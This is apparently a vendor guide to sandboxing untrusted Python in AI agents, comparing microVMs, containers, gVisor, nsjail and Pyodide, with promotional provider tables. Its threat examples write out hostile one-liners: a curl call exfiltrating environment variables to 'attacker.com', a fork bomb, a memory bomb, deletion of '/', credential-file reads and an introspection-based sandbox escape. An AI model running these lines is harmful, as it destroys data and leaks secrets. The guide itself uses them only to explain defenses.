Python Sandbox: How to Safely Execute Python Code in AI Agents (2026)

What Is a Python Sandbox

A Python sandbox is an isolated environment where Python code runs without access to the host machine. The sandbox intercepts or prevents dangerous operations: filesystem reads and writes, network calls, process spawning, environment variable access, and resource consumption beyond set limits. Code goes in, results come out, and the host stays untouched.

The need is simple. You have Python code you did not write and do not trust. Maybe an LLM generated it. Maybe a user submitted it. Maybe it came from a third-party plugin. You need to execute it, capture the output, and guarantee it cannot damage your system or leak your data.

Safe ways to sandbox Python in-process

~125ms

Firecracker microVM boot time

15M+

Monthly sandbox sessions (E2B alone, 2025)

Python Cannot Sandbox Itself

Every attempt at language-level Python sandboxing has been broken. RestrictedPython, exec() with stripped __builtins__, PyPy sandbox mode: all bypassed via Python's introspection capabilities. The object hierarchy (().__class__.__bases__[0].__subclasses__()) gives any code a path to os, subprocess, and importlib. The only reliable sandboxing happens outside the Python process, at the OS or hypervisor level.

Why You Need a Python Sandbox

Three categories of applications require Python sandboxing, and one is growing faster than the other two combined.

AI Agents Executing Code

Every AI coding agent, code interpreter, and data analysis assistant generates Python code and needs to run it. Claude Code, Cursor, Devin, OpenAI Codex, and open-source frameworks like LangChain and CrewAI all execute LLM-generated code as part of their core loop. The agent writes a function, runs the tests, reads the error, fixes the code, re-runs. Each execution is untrusted: the LLM might hallucinate a call to os.remove("/") or subprocess.run(["curl", "attacker.com", "-d", env_vars]). Without a sandbox, that code runs with whatever permissions your server process has.

E2B reported scaling from 40,000 sandbox sessions per month in March 2024 to 15 million per month by March 2025. By early 2026, roughly 50% of Fortune 500 companies run agent workloads that require code sandboxing. The demand curve is steep.

Code Interpreters and Notebooks

Jupyter-style code interpreters embedded in chat interfaces (ChatGPT's Code Interpreter, Google's Gemini code execution) run user-submitted Python in sandboxed environments. These need persistent filesystem state across cell executions, support for data science packages (NumPy, pandas, matplotlib), and the ability to produce files (charts, CSVs) that the user can download.

Education and Evaluation Platforms

Coding education platforms (LeetCode, HackerRank, Codecademy) and hiring evaluation tools run student or candidate code. The requirements overlap with AI agents: isolation, resource limits, and fast cold starts so users do not wait.

Filesystem Containment

Sandboxed code cannot read /etc/passwd, your .env file, or any host filesystem path. Reads and writes are confined to the sandbox volume.

Resource Limits

CPU time, memory, disk, and wall-clock limits prevent infinite loops, fork bombs, and memory exhaustion from crashing your server.

Network Isolation

Outbound network access is blocked or restricted to an allow-list. LLM-generated code cannot exfiltrate data to external servers.

Five Approaches to Python Sandboxing

Python sandboxing happens outside the language runtime. The five viable approaches in 2026 sit on a spectrum from fast-but-weaker isolation (process-level) to slower-but-stronger (full microVMs), with WASM as an orthogonal option that trades compatibility for browser-native security.

1. Firecracker MicroVMs

Firecracker, built by AWS in Rust, boots a lightweight virtual machine in ~125ms. Each microVM gets its own Linux kernel, its own filesystem, and hardware-enforced isolation via KVM. A kernel exploit inside the guest VM cannot reach the host because the hypervisor boundary is enforced by the CPU, not by software. This is the same technology that powers AWS Lambda and Fargate.

For Python sandboxing, Firecracker is the gold standard for security. The tradeoff is operational complexity: you need KVM-capable hosts (bare metal or nested virtualization), a VM image with Python pre-installed, and orchestration for creating and destroying VMs. Managed providers (Morph Sandbox, E2B, Northflank) handle this for you.

When to Choose Firecracker

Production AI agents running untrusted code at scale. Multi-tenant environments where one user's code must never affect another's. Any workload where a container escape would be a security incident.

2. Docker Containers with Seccomp/AppArmor

Docker containers use Linux namespaces and cgroups to isolate processes. Add seccomp profiles (restrict system calls to a whitelist) and AppArmor or SELinux profiles (restrict file and network access), and you get a practical sandbox. Cold start is 1-5 seconds for a Python container with pre-installed dependencies.

The weakness: containers share the host kernel. A kernel vulnerability can break container isolation. Docker is not designed as a security boundary, and the Docker documentation says as much. For sandboxing untrusted code, Docker alone is insufficient. Docker + seccomp + AppArmor + read-only filesystem + dropped capabilities + no-new-privileges is a reasonable defense-in-depth setup, but it is fundamentally weaker than a hypervisor boundary.

3. gVisor (Application Kernel)

gVisor, developed by Google, runs as a user-space application kernel. Instead of letting your Python process make system calls directly to the host kernel, gVisor's Sentry component intercepts every syscall and handles it in user space. Only a small, vetted set of syscalls reach the real kernel. This means a kernel exploit in the sandboxed process hits gVisor's Go-based kernel reimplementation, not the host kernel.

gVisor runs as a drop-in replacement for the standard container runtime (install runsc, point Docker or Kubernetes at it). Performance overhead is 5-30% on syscall-heavy workloads. It powers Google Cloud Run and GKE Sandbox. For Python sandboxing, gVisor handles most workloads well, though some low-level operations (ptrace, certain ioctls) are not supported.

4. nsjail (Process-Level Isolation)

nsjail is a lightweight process isolation tool that combines Linux namespaces, seccomp-bpf, and cgroups. It creates a minimal sandbox around a single process without the overhead of a container image or VM. Configuration is a single protobuf or command-line flags: specify allowed syscalls, filesystem mounts, resource limits, and network access.

For Python, nsjail is fast (no image pull, no VM boot) and simple to deploy. The isolation is weaker than gVisor or Firecracker because it relies entirely on the host kernel's namespace and seccomp implementation. It is a good fit for internal tools and low-risk sandboxing where the threat model is accidental damage, not adversarial attack.

5. Pyodide (WebAssembly)

Pyodide compiles CPython to WebAssembly and runs it in a browser or server-side WASM runtime (Deno, Node.js, Cloudflare Workers). The WebAssembly sandbox is enforced by the runtime: code cannot access the host filesystem, spawn processes, or make raw network calls. LangChain's langchain-sandbox package uses Pyodide inside Deno for this reason.

The tradeoff is significant. Pyodide is 2-10x slower than native CPython on compute-heavy tasks. It supports hundreds of packages (NumPy, pandas, SciPy, scikit-learn, matplotlib), but anything that requires C extensions not yet ported to WASM will fail. No subprocess, no os.system, no pip install at runtime. Pyodide is best for lightweight computation and data analysis where you control the package set.

Approach	Isolation Strength	Cold Start	Python Compatibility	Operational Complexity
Firecracker MicroVM	Hardware (KVM)	~125ms	Full CPython + pip	High (needs KVM hosts)
Docker + Seccomp	Kernel namespaces	1-5s	Full CPython + pip	Medium
gVisor	User-space kernel	~500ms	Most workloads (some syscall gaps)	Medium
nsjail	Namespaces + seccomp	<100ms	Full CPython + pip	Low
Pyodide (WASM)	WASM sandbox	<50ms (in-browser)	Hundreds of packages, no subprocess	Low

Provider Comparison

If you do not want to run sandbox infrastructure yourself, five options cover the spectrum from fully managed microVM platforms to self-hosted containers.

Feature	Morph Sandbox	E2B	Modal	Docker (self-hosted)	Pyodide
Isolation technology	Firecracker microVM	Firecracker microVM	gVisor containers	Namespaces + seccomp	WebAssembly
Cold start	<300ms	<500ms	<1s (CPU)	1-5s (image dependent)	<50ms (in-memory)
Python version	3.10-3.12	3.10-3.12	3.10-3.12	Any (you choose)	3.11 (compiled to WASM)
pip install at runtime	Yes	Yes	Yes (at build)	Yes	No (micropip only)
Filesystem persistence	Session-scoped	Session-scoped	Volumes	You manage	None (in-memory)
Streaming output	WebSocket + SDK	WebSocket + SDK	Generator-based	Docker logs	Callback-based
SDK languages	Python, TypeScript	Python, TypeScript	Python	Any (Docker API)	JavaScript/TypeScript
Pricing	Included with Morph API	~$0.05/hr per vCPU, Pro $150/mo	Per CPU-second	Your infra cost	Free (open source)
Best for	AI tools on Morph	Standalone AI sandbox	ML/data pipelines	Full control needed	Browser-based execution

Morph Sandbox SDK

Firecracker-based microVM sandbox built for AI agent workflows. Session-scoped filesystem persistence means your agent can write files, pip install packages, and iterate across multiple executions without re-creating state. Included with Morph API plans, so teams already using Morph for LLM inference add sandboxing at zero marginal cost. Python and TypeScript SDKs with WebSocket streaming for real-time output.

E2B

The most established standalone sandbox platform for AI tools. Also Firecracker-based. Clean SDK, strong documentation, active community. Sub-500ms cold starts. Separate vendor and billing from your LLM provider, which adds operational overhead but gives you flexibility to use any model provider.

Modal

Designed for ML workloads with strong GPU support (A100, H100). Uses gVisor for container isolation. The Python-first SDK uses decorators (@app.function()) rather than explicit sandbox lifecycle calls. Better suited for data science pipelines and training jobs than for ephemeral AI agent sandbox sessions.

Docker (Self-Hosted)

Full control, full responsibility. You build the Python image, configure seccomp profiles, manage AppArmor policies, handle container lifecycle, and monitor resource usage. The isolation is kernel-level (weaker than microVM), but you own the entire stack. Reasonable for internal tools where the threat model is bugs, not adversaries.

Pyodide (Open Source)

Free and browser-native. No server needed for client-side execution. Strong isolation via the WebAssembly sandbox. Limited to the packages Pyodide has ported and cannot run shell commands or install arbitrary pip packages. Best for lightweight computation in browser-based tools and educational platforms.

Code Examples

Working examples for the most common Python sandboxing patterns. All examples use TypeScript since most AI agent frameworks are TypeScript or Python on the orchestration side.

Morph Sandbox: Run untrusted Python

import { MorphSandbox } from "@anthropic-ai/morph-sandbox";

const sandbox = await MorphSandbox.create({
  apiKey: process.env.MORPH_API_KEY,
  template: "python-3.12",
  timeout: 60,
});

// Run LLM-generated Python code
const result = await sandbox.exec(`python3 -c "
import json
import math

data = [math.sqrt(i) for i in range(10)]
print(json.dumps({'values': data, 'count': len(data)}))
"`);

console.log(result.stdout);
// {"values": [0.0, 1.0, 1.414..., ...], "count": 10}
console.log(result.exitCode); // 0

await sandbox.destroy();

Morph Sandbox: Agent installs packages and iterates

const sandbox = await MorphSandbox.create({
  apiKey: process.env.MORPH_API_KEY,
  template: "python-3.12",
  timeout: 300,
});

// Agent writes a data analysis script
await sandbox.filesystem.write("/app/analyze.py", agentGeneratedCode);
await sandbox.filesystem.write("/app/requirements.txt", "pandas\nmatplotlib\n");

// Install dependencies (filesystem persists between calls)
const install = await sandbox.exec("pip install -r /app/requirements.txt");
if (install.exitCode !== 0) {
  throw new Error(`pip install failed: ${install.stderr}`);
}

// Run the analysis
let result = await sandbox.exec("cd /app && python analyze.py");

// If it fails, let the LLM fix and retry
let retries = 0;
while (result.exitCode !== 0 && retries < 3) {
  const fixedCode = await llm.fixCode(agentGeneratedCode, result.stderr);
  await sandbox.filesystem.write("/app/analyze.py", fixedCode);
  result = await sandbox.exec("cd /app && python analyze.py");
  retries++;
}

// Pull generated chart
const chart = await sandbox.filesystem.read("/app/output.png");

await sandbox.destroy();

Pyodide: Browser-side Python sandbox

import { loadPyodide } from "pyodide";

const pyodide = await loadPyodide();

// Install packages available in Pyodide
await pyodide.loadPackage(["numpy", "pandas"]);

// Run untrusted Python in the WASM sandbox
const result = pyodide.runPython(`
import numpy as np
import pandas as pd

data = pd.DataFrame({
    'x': np.random.randn(100),
    'y': np.random.randn(100),
})
data.describe().to_json()
`);

console.log(result);
// No filesystem access, no subprocess, no network calls.
// The WASM sandbox enforces this at the runtime level.

Docker: Self-hosted Python sandbox with seccomp

# Dockerfile for a minimal Python sandbox image
# FROM python:3.12-slim
# RUN useradd -m sandbox
# USER sandbox
# WORKDIR /sandbox

# Run with security restrictions
docker run --rm \
  --security-opt seccomp=sandbox-seccomp.json \
  --security-opt no-new-privileges \
  --read-only \
  --tmpfs /tmp:size=100m \
  --memory 256m \
  --cpus 0.5 \
  --network none \
  --user sandbox \
  -v /path/to/code.py:/sandbox/code.py:ro \
  python-sandbox:latest \
  python /sandbox/code.py

# seccomp profile whitelists ~60 syscalls
# --network none blocks all outbound traffic
# --read-only prevents filesystem writes outside /tmp
# --memory and --cpus prevent resource exhaustion

nsjail: Lightweight process sandbox

# nsjail wraps a single process with namespace + seccomp isolation
nsjail \
  --mode once \
  --chroot /sandbox/rootfs \
  --user 65534 --group 65534 \
  --time_limit 30 \
  --rlimit_as 512 \
  --rlimit_cpu 10 \
  --rlimit_fsize 64 \
  --disable_proc \
  --iface_no_lo \
  --seccomp_string 'ALLOW { read, write, open, close, mmap, ... }' \
  -- /usr/bin/python3 /sandbox/code.py

# No container image needed. No VM boot.
# Starts in <100ms with kernel-level isolation.
# Weaker than Firecracker but sufficient for internal tools.

Security Considerations

Choosing a sandbox technology is step one. Configuring it correctly is where most teams fail. These are the attack vectors that LLM-generated Python code can exploit and the mitigations for each.

Environment Variable Leakage

LLM-generated code can include import os; print(os.environ) to read API keys, database credentials, and secrets from environment variables. Mitigation: the sandbox process must have a clean environment. Do not pass host environment variables into the sandbox. Inject only the variables the code explicitly needs, and never inject secrets.

Network Exfiltration

Code can use urllib, requests, socket, or raw syscalls to send data to an external server. Mitigation: run the sandbox with no network access by default (--network none in Docker, --iface_no_lo in nsjail). If your workload needs network access (e.g., pip install), use an egress proxy with domain allow-listing.

Resource Exhaustion

An infinite loop, a fork bomb (import os; [os.fork() for _ in iter(int, 1)]), or a memory bomb ('A' * 10**12) can crash the host if resources are not capped. Mitigation: enforce CPU time limits, memory limits, process count limits (no-fork in seccomp), and wall-clock timeouts. Kill the sandbox if any limit is exceeded.

Filesystem Traversal

Code can attempt to read /etc/shadow, /proc/1/environ, or ../../ paths to access host data. Mitigation: use a separate filesystem (microVM), a chroot jail, or read-only bind mounts. The sandbox should have its own root filesystem with no visibility into the host.

Supply Chain Attacks via pip

LLM-generated code might pip install a typosquatted or malicious package. Mitigation: maintain an allow-list of approved packages. Block pip install entirely if the workload does not need it, or restrict it to a curated package index. Some managed sandbox providers pre-install common packages so runtime pip install is unnecessary.

Timing and Side-Channel Attacks

In multi-tenant environments, one sandbox's resource usage can affect another's performance, leaking information about co-located workloads. Mitigation: Firecracker microVMs provide the strongest isolation here because each VM has dedicated resources. Containers sharing a kernel are more susceptible. For most AI agent use cases, this threat is theoretical, but it matters for security-sensitive deployments.

Attack Vector	Risk Level	Mitigation
Environment variable leakage	High	Clean sandbox environment, no host env passthrough
Network exfiltration	High	No network by default, egress proxy with allow-list
Resource exhaustion (CPU/memory)	High	cgroup limits, wall-clock timeout, kill on exceed
Filesystem traversal	Medium	Separate filesystem (microVM) or chroot + read-only mounts
Malicious pip packages	Medium	Package allow-list or curated index
Container/sandbox escape	Low (with microVM)	Firecracker or gVisor eliminates shared kernel risk

Frequently Asked Questions

What is a Python sandbox?

An isolated execution environment where Python code runs without access to the host filesystem, network, or system resources. Sandboxes prevent untrusted code from reading sensitive data, consuming excessive resources, making network calls, or modifying the host system. They are used by AI agents, code interpreters, education platforms, and any application that executes user-submitted or LLM-generated Python.

Why can't Python sandbox itself at the language level?

Python's introspection makes in-process sandboxing impossible to secure. Any code that can access an object can walk ().__class__.__bases__[0].__subclasses__() to reach builtins and import os, subprocess, or importlib. RestrictedPython, exec() with stripped builtins, and PyPy sandbox mode have all been bypassed. The Python wiki states: "There is no known way to run untrusted Python code safely within the same process." Reliable sandboxing requires OS-level or hypervisor-level isolation.

What is the best way to sandbox Python for AI agents?

Firecracker microVMs provide the strongest isolation with sub-300ms boot times. Each sandbox gets its own kernel, filesystem, and network stack enforced by hardware (KVM). Managed providers like Morph Sandbox SDK and E2B handle orchestration so you do not build the infrastructure yourself. For lighter workloads with a lower threat model, gVisor containers offer a good balance of security and performance.

What is the difference between Firecracker and Docker for Python sandboxing?

Docker containers share the host kernel. A kernel exploit can escape a container. Firecracker microVMs run a separate guest kernel with hardware-enforced isolation via KVM. A kernel exploit in the guest cannot reach the host. Firecracker boots in ~125ms (faster than a full VM), making it practical for ephemeral sandboxes. Docker is easier to set up but provides weaker isolation.

Can I use Pyodide (WebAssembly) as a Python sandbox?

Yes, with tradeoffs. Pyodide compiles CPython to WebAssembly and supports hundreds of packages including NumPy, pandas, and SciPy. The WASM sandbox is strong: code cannot access the host filesystem or network. The limitations are performance (2-10x slower than native CPython), no subprocess or os.system, and no runtime pip install. Pyodide works well for lightweight computation and browser-based tools. It does not work for workloads that need shell access, arbitrary packages, or native C extensions.

How do Morph Sandbox and E2B compare for Python sandboxing?

Both use Firecracker microVMs. E2B is a standalone service with per-second billing (~$0.05/hr per vCPU, Hobby includes a one-time $100 credit, Pro at $150/mo). Morph Sandbox is bundled with Morph API plans at no extra cost. Both provide Python and TypeScript SDKs, session-scoped filesystem persistence, and WebSocket streaming. Choose Morph if you already use Morph for LLM inference (zero additional cost and one fewer vendor). Choose E2B if you use a different LLM provider.

What security risks exist when running Python from AI agents?

LLM-generated Python can contain: environment variable reads that leak API keys, network calls that exfiltrate data, infinite loops or memory bombs that crash the host, filesystem traversals that read sensitive files, and pip install commands that pull malicious packages. A proper sandbox must handle all of these through process isolation, filesystem containment, network restrictions, resource limits, and dependency allow-listing.

How fast can a Python sandbox start?

Firecracker microVMs boot in ~125ms. gVisor containers start in ~500ms. Nsjail-wrapped processes start in under 100ms. Pyodide initializes in under 50ms when running in-memory. Docker containers with pre-pulled images start in 1-5 seconds. For interactive AI tools where users are waiting, sub-500ms cold start is the threshold for acceptable latency.

Try Morph Sandbox SDK

Run untrusted Python safely in Firecracker microVMs with sub-300ms cold starts. Session-scoped persistence, WebSocket streaming, and Python/TypeScript SDKs. Included free with Morph API.

Get API Key

Read the Docs

Morph Fast Apply

Morph WarpGrep

Morph Compact

Morph Glance

Morph MCP

Morph Monitor

Blog

Startup Credits

Students

Contact Us

About

Careers